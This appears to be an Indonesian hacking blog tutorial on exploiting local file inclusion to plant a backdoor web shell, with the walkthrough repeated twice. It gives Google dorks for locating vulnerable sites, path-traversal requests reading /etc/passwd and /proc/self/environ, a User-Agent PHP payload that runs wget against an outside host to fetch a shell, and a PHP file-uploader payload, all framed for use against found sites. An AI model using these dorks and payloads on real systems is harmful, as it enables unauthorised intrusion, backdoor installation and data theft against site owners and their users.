Sebenernya ini exploit lama banget. Malah bisa dibilang basic kalo
kalian pengen belajar pentest web. Setara sama SQLi lah . Tapi post aja
biar isi blog nya lengkap, sebagai arsip pribadi juga hehe.
Langsung saja, disini yang dibutuhkan cuma Browser Mozilla dengan addons tamper data.
Google Dorks :
inurl:/view/lang/index.php?page=?page=
inurl:/shared/help.php?page=
Use your brain , bitch !
Saya anggep sudah dapat site vuln nya.
Pertama, test basic apa web tersebut vuln LFI.
localhost/view.php?page=email.php
Coba ganti email.php dengan ../../
localhost/view.php?page=../../
Jika kalian dapat error seperti
Warning: include(../../) [function.include]: failed to open stream: No such file or directory in /home/hackers/public_html/view.php on line 1337
Viola ! :D Ada kesempatan untuk membuka localfile yang lebih sensitif :D
Kita coba panggil file /etc/passwd nya .
localhost/view.php?page=etc/passwd
Masih error ?
Warning: include(etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/hackers/public_html/view.php on line 1337
Kita coba naikkan direktori nya.
localhost/view.php?page=../../../../../etc/passwd
Kalau masih error, naikkan terus direktori nya sampai file /etc/passwd nya kebaca.
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
.... dsb :p
Sekarang kita coba panggil apakah proc/self/environ bisa diakses atau tidak. Karena disinilah proses inject backdoor akan dimulai.
localhost/view.php?page=../../../../../proc/self/environ
DOCUMENT_ROOT=/home/hackers/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t13371b341231b94r1844ac2ad7ac
HTTP_HOST=localhost HTTP_REFERER=http://localhost/view.php?page=../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2015102815 Ubuntu/9.04 (trusty) Firefox/5.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=127.0.0.1 REMOTE_PORT=1337
REQUEST_METHOD= GET REQUEST_URI = /view.php?page=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/hackers/public_html/view.php SCRIPT_NAME=/view.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=hackers@site.com SERVER_NAME=localhost
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at localhost Port 80
Berarti web tersebut bisa diinject. Kalau blank, berarti tidak bisa.
Langkah selanjutnya, aktifkan tamper data.
Load halaman localhost/view.php?page=../../../../../proc/self/environ
Lalu tamper.
pada user-agent di addons tamper data tadi isi dengan
<?system(‘wget http://yuyudhn1337.org/exp/cmdshell.txt -O fvck.php’);?>
Lalu submit.
Shell kalian akan terletak di
localhost/fvck.php
Pada beberapa kasus, fungsi system di server dimatikan sehingga kita tidak bisa melakukan wget melalui cara diatas.
Tapi ada cara lain.
Pad user-agent masukkan script uploader berikut :
Sekian tutor kali ini semoga bermanfaat.
Uploading Backdoor Shell via Local File Inclusion (LFI) Exploit
Langsung saja, disini yang dibutuhkan cuma Browser Mozilla dengan addons tamper data.
Google Dorks :
inurl:/view/lang/index.php?page=?page=
inurl:/shared/help.php?page=
Use your brain , bitch !
Saya anggep sudah dapat site vuln nya.
Pertama, test basic apa web tersebut vuln LFI.
localhost/view.php?page=email.php
Coba ganti email.php dengan ../../
localhost/view.php?page=../../
Jika kalian dapat error seperti
Warning: include(../../) [function.include]: failed to open stream: No such file or directory in /home/hackers/public_html/view.php on line 1337
Viola ! :D Ada kesempatan untuk membuka localfile yang lebih sensitif :D
Kita coba panggil file /etc/passwd nya .
localhost/view.php?page=etc/passwd
Masih error ?
Warning: include(etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/hackers/public_html/view.php on line 1337
Kita coba naikkan direktori nya.
localhost/view.php?page=../../../../../etc/passwd
Kalau masih error, naikkan terus direktori nya sampai file /etc/passwd nya kebaca.
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
.... dsb :p
Sekarang kita coba panggil apakah proc/self/environ bisa diakses atau tidak. Karena disinilah proses inject backdoor akan dimulai.
localhost/view.php?page=../../../../../proc/self/environ
DOCUMENT_ROOT=/home/hackers/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t13371b341231b94r1844ac2ad7ac
HTTP_HOST=localhost HTTP_REFERER=http://localhost/view.php?page=../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2015102815 Ubuntu/9.04 (trusty) Firefox/5.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=127.0.0.1 REMOTE_PORT=1337
REQUEST_METHOD= GET REQUEST_URI = /view.php?page=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/hackers/public_html/view.php SCRIPT_NAME=/view.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=hackers@site.com SERVER_NAME=localhost
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at localhost Port 80
Berarti web tersebut bisa diinject. Kalau blank, berarti tidak bisa.
Langkah selanjutnya, aktifkan tamper data.
Load halaman localhost/view.php?page=../../../../../proc/self/environ
Lalu tamper.
pada user-agent di addons tamper data tadi isi dengan
<?system(‘wget http://yuyudhn1337.org/exp/cmdshell.txt -O fvck.php’);?>
Lalu submit.
Shell kalian akan terletak di
localhost/fvck.php
Pada beberapa kasus, fungsi system di server dimatikan sehingga kita tidak bisa melakukan wget melalui cara diatas.
Tapi ada cara lain.
Pad user-agent masukkan script uploader berikut :
<?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); ?><p>Setelah diupload, maka shell akan terletak di root path domain.
<h1> shu </h1></p>
<br> <form action="" method="post" enctype="multipart/form-data">
Filename: <input type="file" name="file" /><input type="submit" value="Submit" /><br>
Sekian tutor kali ini semoga bermanfaat.
Uploading Backdoor Shell via Local File Inclusion (LFI) Exploit
Dapatkan Tips Menarik Setiap Harinya!
- Dapatkan tips dan trik yang belum pernah kamu tau sebelumnya
- Jadilah orang pertama yang mengetahui hal-hal baru di dunia teknologi
- Dapatkan Ebook Gratis: Cara Dapat 200 Juta / bulan dari AdSense
0 Response to " Uploading Backdoor Shell via Local File Inclusion (LFI) Exploit"
Post a Comment
Catatan Untuk Para Jejaker